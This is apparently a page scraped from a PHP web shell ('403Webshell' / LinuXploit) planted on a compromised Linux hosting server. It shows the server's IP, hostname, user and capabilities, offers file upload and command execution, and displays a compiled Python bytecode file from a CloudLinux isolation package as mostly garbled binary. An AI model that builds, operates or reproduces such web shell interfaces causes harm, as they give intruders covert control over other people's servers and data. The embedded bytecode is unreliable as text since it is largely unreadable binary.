403Webshell
Server IP : 162.19.112.25  /  Your IP : 216.73.217.78
Web Server : LiteSpeed
System : Linux qamar.tasjeel.ae 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
User : archiart ( 1428)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib/python3.11/site-packages/ssa/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib/python3.11/site-packages/ssa/__pycache__/website_isolation.cpython-311.pyc
�

?Ocj�+����dZddlZddlZddlZddlZddlmZddlmZddl	m
Z
mZmZm
Z
mZ	ddlmZmZn#e$r	d�Zd	�ZYnwxYweje��Zdd�Zd�Zdd
�Zdd�Zded
dfd�Zded
dfd�ZdS)z�
Website isolation support for SSA (clos_ssa.ini) files.

This module provides functions to manage clos_ssa.ini files in per-website
directories when CageFS website isolation is enabled.
�N)�iglob)�
disable_quota�)�
INI_FILE_NAME�INI_USER_LOCATIONS_BASE�$INI_USER_LOCATIONS_WEBSITE_ISOLATION�is_excluded_path�extract_php_version)�(is_website_isolation_allowed_server_wide�is_isolation_enabledc��dS�NF�r��L/opt/cloudlinux/venv/lib64/python3.11/site-packages/ssa/website_isolation.pyrr$����urc��dSrr)�users rrr'rr�returnc	�`�|||��5t��5tj|tjtjztjztjztjzd��}tj|d��5}tj
tj|�����j
��std���|�|��ddd��n#1swxYwYddd��n#1swxYwYddd��dS#1swxYwYdS)a�
    Write content into a per-website clos_ssa.ini under the tenant context.

    O_NOFOLLOW refuses a tenant-planted symlink at the ini path (raises OSError
    ELOOP on a final-component symlink). O_NONBLOCK stops a tenant-planted FIFO
    from blocking the shared regen thread forever on open() (a reader-less
    O_WRONLY FIFO open fails ENXIO instead of hanging). The fstat check then
    refuses any non-regular target (FIFO/device/socket) by raising OSError, so
    it is skipped rather than written (and, like the O_NOFOLLOW/O_NONBLOCK
    refusals, is never counted by callers as a created ini). O_NONBLOCK has no
    effect on regular-file writes. Callers handle the raised OSError per-target.
    i��wz=refusing to write non-regular ini target (not a regular file)N)r�os�open�O_WRONLY�O_CREAT�O_TRUNC�
O_NOFOLLOW�
O_NONBLOCK�fdopen�stat�S_ISREG�fstat�fileno�st_mode�OSError�write)�ini_file�content�uid�gid�user_context_func�fd�fs       r�_write_isolation_inir..s���
�	�3��	$�	$�	�	�m�o�o�	�	�
�W�X�r�{�R�Z�7�"�*�D�r�}�T�WY�Wd�d�fk�
l�
l��
�Y�r�3�
�
�	�1��<�������� 4� 4� <�=�=�
_�
�]�^�^�^�
�G�G�G����	�	�	�	�	�	�	�	�	�	�	����	�	�	�	�	�	�	�	�	�	�	�	�	�	�	����	�	�	�	�	�	�	�	�	�	�	�	�	�	�	�	����	�	�	�	�	�	sZ�D#�A*D�A"C4�(D�4C8�8D�;C8�<D�?D#�D	�D#�D	�D#�#D'�*D'c�>�|||��5tj|tjtjztjz��}tj|��5}t
jtj|�	����j
��s4t�d|��	ddd��ddd��dS|�
��cddd��cddd��S#1swxYwY	ddd��dS#1swxYwYdS)a�
    Read a base clos_ssa.ini under the tenant context, refusing non-regular sources.

    The base ini path is tenant-controlled, so the same hardening as the write
    helper applies: O_NOFOLLOW refuses a final-component symlink (ELOOP), and
    O_NONBLOCK makes an O_RDONLY open of a tenant-planted FIFO return immediately
    instead of blocking the shared regen thread forever waiting for a writer. The
    fstat check on the opened fd then refuses any non-regular source (FIFO/device/
    socket): it is skipped rather than read. Returns the file content, or None if
    the source is non-regular. Callers handle the raised OSError per-source.
    z#Refusing to read non-regular ini %sN)rr�O_RDONLYrrrr r!r"r#r$�logger�warning�read)r'r)r*r+r,r-s      r�_read_isolation_inir4Gs���
�	�3��	$�	$���
�W�X�r�{�R�]�:�R�]�J�
K�
K��
�Y�r�]�]�	�a��<�������� 4� 4� <�=�=�
����D�h�O�O�O��	�	�	�	�	�	����������6�6�8�8�		�	�	�	�	�	�	���������	�	�	�	����	�	�	�	�	���������������������sC�AD�AC9�5D�
C9� D�9C=	�=D�C=	�D�D�Dc
��t��sdSi}tD�]}t|d��D]�}t|��r�	|d|��}n+#t$rt
�d|��Y�LwxYwtj�	|t��}	t||j|j
|��}n6#t$rY��t$rt
�d|��Y��wxYw|���t!|��}|r||j|j
f||j|f<����|sdSt%��}t&D�]}}t|d��D�]c}t|��r�	|d|��}n+#t$rt
�d|��Y�MwxYwt)|j��s�ft!|��}|s�x|j|f}	|	|vr��||	\}}
}tj�	|t��}tj�tj�|����s��	t/|||
||��|�|j����$#t$r4}t
�d|t3|����Yd}~��]d}~wwxYw��|D]}
t5|
���dS)z�
    Copy clos_ssa.ini files from base user paths to per-website directories.

    :param user_context_func: Context manager function for user permissions
    N�pathr�!Cannot get pw_record for path: %s�Failed to read %s�Failed to create %s: %s)rrrr	�	Exceptionr1�debugrr6�joinrr4�pw_uid�pw_gid�FileNotFoundErrorr2r
�pw_name�setrr�exists�dirnamer.�add�str�"_regenerate_user_website_isolation)r+�base_ini_files�location�dir_path�	pw_recordr'r(�php_ver�created_ini�keyr)r*�e�usernames              r�$copy_inis_to_website_isolation_pathsrP\se��4�5�5�����N�+�����h�v�.�/�/�	�	�H���)�)�
��
�,�H�V�,�X�6�6�	�	���
�
�
����@�(�K�K�K���
�����w�|�|�H�m�<�<�H�
�-�h�	�8H�)�JZ�\m�n�n����$�
�
�
����
�
�
����2�H�=�=�=���
�������)�(�3�3�G��
���$��$�@��	� 1�7�;�<��+	�6�����%�%�K�9�����h�v�.�/�/�	�	�H���)�)�
��
�,�H�V�,�X�6�6�	�	���
�
�
����@�(�K�K�K���
����(�	�(9�:�:�
��)�(�3�3�G��
���$�g�.�C��.�(�(�� .�s� 3��G�S�#��w�|�|�H�m�<�<�H��7�>�>�"�'�/�/�(�";�";�<�<�
��
�$�X�w��S�BS�T�T�T����	� 1�2�2�2�2���
�
�
����8�(�C��F�F�K�K�K����������
����5	�: �5�5��*�8�4�4�4�4�5�5sT�A�%A?�>A?�(C�
C8�$C8�7C8�0F�%F*�)F*�-J�
J>�
)J9�9J>c
���t��sdSt��}tD�]G}t|d��D�]}t	|��r�	|d|��}n#t
$rY�2wxYwtj�|t��}tj�
|��r�	||j|j��5t
j
|��ddd��n#1swxYwY|�|j����#t
$r4}t �d|t%|����Yd}~��d}~wwxYw��|D]}t'|�����IdS)z�
    Remove clos_ssa.ini files from all per-website directories.

    :param user_context_func: Context manager function for user permissions
    Nr6rzFailed to remove %s: %s)rrArrr	r:rr6r<rrBr=r>�unlinkrDr@r1r2rErF)r+�removed_inirHrIrJr'rNrOs        r�(remove_inis_from_website_isolation_pathsrT�s���4�5�5�����%�%�K�8�9�9���h�v�.�/�/�	�	�H���)�)�
��
�,�H�V�,�X�6�6�	�	���
�
�
���
�����w�|�|�H�m�<�<�H��w�~�~�h�'�'�
��*�*�9�+;�Y�=M�N�N�,�,��	�(�+�+�+�,�,�,�,�,�,�,�,�,�,�,����,�,�,�,��O�O�I�$5�6�6�6�6�� �����N�N�#<�h��A���O�O�O��H�H�H�H���������
�$�	9�	9�H�.�x�8�8�8�8�	9�%9�9sN�A$�$
A1�0A1�9D�C0�$D�0C4�4D�7C4�8D�
E� )E�Erc��	tjdd|gddd���dS#tj$r,}t�d||j��Yd}~dSd}~wwxYw)z`
    Needed to terminate php processes to immediately apply clos_ssa.ini creation/deletion.
    z/usr/sbin/cagefsctlz--site-isolation-regenerateT)�capture_output�check�textzBFailed to trigger cagefsctl site isolation regeneration for %s: %sN)�
subprocess�run�CalledProcessErrorr1r2�stdout)rrNs  rrFrF�s���m���
"�$A�4�H�Y]�ei�pt�	
�	
�	
�	
�	
�	
���(�m�m�m����[�]a�cd�ck�l�l�l�l�l�l�l�l�l�����m���s��A�!A�Ac
��t��sdSt�d|��i}tD�]}t	|d��D]�}t|��r�	|d|��}|j|kr�0n+#t$rt�d|��Y�XwxYwtj
�|t��}	t||j|j|��}n6#t $rY��t$rt�d|��Y��wxYw|���t%|��}|r||j|jf||<����|st�d|��dSt&D�]l}t	|d��D�]R}t|��r�	|d|��}|j|kr�1n+#t$rt�d|��Y�YwxYwt%|��}|s�o||vr�t||\}}	}
tj
�|t��}tj
�tj
�|����s��	t-|||	|
|��t�d|����#t$r4}t�d	|t/|����Yd}~��Ld}~wwxYw��nt�d
|��dS)ap
    Regenerate clos_ssa.ini files for a specific user's website isolation directories.

    This is called by cagefsctl when enabling website isolation for a user.
    Only creates per-website ini files if base per-user ini exists.

    :param user: Username to regenerate ini files for
    :param user_context_func: Context manager function for user permissions
    Nz:Regenerating clos_ssa.ini for user %s website isolation...r6rr7r8z,No base clos_ssa.ini files found for user %sz
Created %sr9z"Finished regenerating for user %s!)rr1�inforrr	r@r:r;rr6r<rr4r=r>r?r2r
rrBrCr.rE)rr+rGrHrIrJr'r(rKr)r*rNs            r�regenerate_inis_for_userr_�st��4�5�5����
�K�K�L�d�S�S�S��N�+�X�X���h�v�.�/�/�	X�	X�H���)�)�
��
�,�H�V�,�X�6�6�	��$��,�,��-���
�
�
����@�(�K�K�K���
�����w�|�|�H�m�<�<�H�
�-�h�	�8H�)�JZ�\m�n�n����$�
�
�
����
�
�
����2�H�=�=�=���
�������)�(�3�3�G��
X�+2�I�4D�i�FV�*W��w�'��/	X�2�����B�D�I�I�I���9�����h�v�.�/�/�	�	�H���)�)�
��
�,�H�V�,�X�6�6�	��$��,�,��-���
�
�
����@�(�K�K�K���
����*�(�3�3�G��
���n�,�,�� .�w� 7��G�S�#��w�|�|�H�m�<�<�H��7�>�>�"�'�/�/�(�";�";�<�<�
��
�$�X�w��S�BS�T�T�T����L�(�3�3�3�3���
�
�
����8�(�C��F�F�K�K�K����������
����3	�:�K�K�4�d�;�;�;�;�;sT� A>�>%B&�%B&�C,�,
D�8$D�D�F;�;%G#�"G#�,.J�
K�&)K�K)rN)�__doc__�loggingrr rY�globr�secureior�clos_ssa_inirrrr	r
�clcagefslib.domainrr�ImportError�	getLogger�__name__r1r.r4rPrTrErFr_rrr�<module>ris���������	�	�	�	���������������"�"�"�"�"�"����������������a�a�a�a�a�a�a�a�a������������������
��	�8�	$�	$������2���*L5�L5�L5�L5�^9�9�9�9�B	m�S�	m�T�	m�	m�	m�	m�N<�3�N<�d�N<�N<�N<�N<�N<�N<s�7�A�A

Youez - 2016 - github.com/yon3zu
LinuXploit